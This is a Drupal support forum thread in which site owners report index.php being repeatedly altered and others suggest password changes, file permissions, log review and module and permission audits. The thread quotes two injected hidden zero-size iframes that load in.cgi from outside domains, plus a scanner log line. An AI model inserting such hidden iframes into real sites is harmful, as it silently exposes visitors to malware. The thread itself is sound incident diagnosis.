I'm running a web site with a Durpal 6.4 installation. All of my modules are up to date with the latest version. When I run cron, everything looks alright.
However, every 2-3 days my index gets overwritten by something. The following code is added to the bottom of my index.php
<!-- ~ --><iframe src="http://google-analistyc.net/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ -->
and another time
<!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe> <!-- ~ -->
Everything else in the index.php stays intact, only that line is added (which apparently causes my entire site to stop working.)
I am running the following modules:
Administration Menu 6.x-1.1
Content 6.x-2.0-rc7
Content Copy 6.x-2.0-rc7
Content Permissions 6.x-2.0-rc7
Fieldgroup 6.x-2.0-rc7
Node Reference 6.x-2.0-rc7
Number 6.x-2.0-rc7
Option Widgets 6.x-2.0-rc7
Text 6.x-2.0-rc7
User Reference 6.x-2.0-rc7
Aggregator 6.4
Blog 6.4
Blog API 6.4
Book 6.4
Color 6.4
Comment 6.4
Contact 6.4
Content translation 6.4
Database logging 6.4
Forum 6.4
Help 6.4
Locale 6.4
Menu 6.4
OpenID 6.4
Path 6.4
PHP filter 6.4
Ping 6.4
Poll 6.4
Profile 6.4
Search 6.3
Statistics 6.4
Syslog 6.4
Taxonomy 6.4
Throttle 6.4
Tracker 6.4
Trigger 6.4
Update status 6.4
Upload 6.4
Date 6.x-2.0-rc3
Date API 6.x-2.0-rc3
Date Copy 6.x-2.0-rc3
Date PHP4 6.x-2.0-rc3
Date Popup 6.x-2.0-rc3
Date Repeat API 6.x-2.0-rc3
Date Timezone 6.x-2.0-rc3
FCKeditor 6.x-1.3-rc1
IMCE 6.x-1.1
phpBBforum 6.x-1.03
Webform 6.x-2.1.3
Insert view 6.x-1.x-dev
Views 6.x-2.0-rc3
Views exporter 6.x-2.0-rc3
Views UI 6.x-2.0-rc3
[Edited to add <code> and </code> tags: nevets]
Comments
Nice :( Try to simply change
Nice :(
Try to simply change your password for FTP and SSH ... Hopefully its gone then.
--patrick
http://rroarrr.com
The security breach could
The security breach could come from inside or from outside Drupal.
Besides changing your server account's passwords, and your user 1 password in Drupal, you could also chmod index.php to 444 to make it read-only.
Then you must search for the causes. Maybe your host's tech support can check the logs to find who and when is modifying your index.php, in case there is a greater security breach on the server.
On your side, you could check
- http://drupal.org/security to see if there is anything about your modules
- /admin/reports/updates to see whether all your modules are up to date
- /admin/settings/filters to make sure that you haven't allowed any untrusted users to use php or unfiltered html
- /admin/user/permissions for any too generous permissions to untrusted users.
Hacked 100%
The same. but other code was inserted.
in apache access.log before index was changed i found
189.21.144.16 - - [27/Sep/2008:09:49:31 -0700] "GET /user/soapCaller.bs HTTP/1.1" 404 4789 "-" "Morfeus Fucking Scanner"
and then nothing suspicious
I am running the following modules:
Content 6.x-2.0-rc7
Content Templates 6.x-0.13
FileField 6.x-3.0-alpha4
ImageField 6.x-3.0-alpha2
Text 6.x-2.0-rc7
Friend 6.x-1.x-dev
Archive 6.x-1.2
Aggregator 6.4
Blog 6.4
Comment 6.4
Contact 6.4
Database logging 6.4
Locale 6.4
Menu 6.4
Path 6.4
PHP filter 6.4
Poll 6.4
Profile 6.4
Search 6.4
Statistics 6.4
Syslog 6.4
Taxonomy 6.4
Nodequeue generate 6.x-2.x-dev
ImageAPI 6.x-1.0-alpha2
ImageAPI GD2 6.x-1.0-alpha2
Nodequeue 6.x-2.x-dev
Blog AddOns 6.x-1.1
Printer-friendly pages (core) 6.x-1.0-rc3
CAPTCHA 6.x-1.0-rc2
Image CAPTCHA 6.x-1.0-rc2
Tagadelic 6.x-1.0
NodeCarousel 6.x-1.x-dev
Views 6.x-2.0-rc3
Views UI 6.x-2.0-rc3
Fivestar 6.x-1.12
Voting API 6.x-2.0-beta3
BUEditor 6.x-1.2
Custom Error 6.x-1.x-dev
Favorite Nodes 6.x-1.x-dev
Forward 6.x-1.x-dev
Google CSE 6.x-1.2
Google CSE search 6.x-1.2
IMCE 6.x-1.1
Meta tags 6.x-1.0-rc1
Multiping 6.x-1.x-dev
Pathauto 6.x-1.0
Quick Tabs 6.x-1.x-dev
Token 6.x-1.10